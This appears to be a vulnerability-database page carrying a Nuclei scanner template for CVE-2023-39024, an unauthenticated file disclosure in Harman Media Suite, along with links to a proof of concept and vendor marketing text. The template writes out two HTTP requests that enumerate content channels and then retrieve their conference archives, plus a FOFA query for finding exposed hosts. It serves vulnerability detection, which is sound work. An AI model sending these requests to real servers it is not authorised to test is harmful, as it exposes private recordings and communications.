| Reporter | Title | Published | Views | Family All 3 |
|---|---|---|---|---|
| Exploit for CVE-2023-39024 | 6 Sep 202418:13 | – | githubexploit | |
| CVE-2023-39024 | 11 Sep 202413:03 | – | cve | |
| PT-2024-12772 · Undefined · Undefined | 6 Sep 202400:00 | – | ptsecurity |
| Source | Link |
|---|---|
| github | www.github.com/BenTheCyberOne/CVE-2023-39024-5-POC |
| sploitus | www.sploitus.com/exploit |
| mediasuite | www.mediasuite.harman.com/channel-store |
id: CVE-2023-39024
info:
name: Harman Media Suite <= 4.2.0 - Local File Disclosure
author: s4e-io
severity: high
description: |
Harman Media Suite (versions 4.2.0 and below) are vulnerable to possible Local File Disclosure. This allows an unauthenticated user to potentially download attachments and recordings stored within the Media Suite application if anonymous access to the User Portal is enabled.
impact: |
Unauthenticated attackers can download attachments and recordings stored within the Harman Media Suite application when anonymous access to the User Portal is enabled, potentially exposing confidential video conferences and internal communications.
remediation: |
Update Harman Media Suite to a version newer than 4.2.0 that requires authentication for content channel archives access or disable anonymous access to the User Portal.
reference:
- https://github.com/BenTheCyberOne/CVE-2023-39024-5-POC
- https://sploitus.com/exploit?id=C20FE0B5-806A-5687-850C-75D195576B35
- https://mediasuite.harman.com/channel-store
metadata:
verified: true
max-request: 2
vendor: harman
product: media-suite
fofa-query: "Harman Media Suite"
tags: cve,cve2023,harman,media-suite,lfi,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"plcm-content-channel", "privacy", "coverImage")'
- 'contains(content_type, "application/vnd.plcm.plcm-content-channel-list+json")'
- 'status_code == 200'
condition: and
internal: true
extractors:
- type: regex
name: channelId
group: 1
regex:
- '"channelId":"([^"]+)"'
internal: true
- raw:
- |
GET /userportal/api/rest/contentChannels/{{channelId}}/archives/?startIndex=0&pageSize=15&sort=time&onlyIncludeApproved=true HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"callId", "displayName", "duration")'
- 'contains(content_type, "application/vnd.plcm.plcm-csc+json")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502207ff22ddc64740853e1f5301e9a851a90e16ae7c92bab0bc000770fc6da3934ef0221009e8baa10db817b996fabea02701c5f2324a03720ea2057b0a45270e7afbf6b2e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation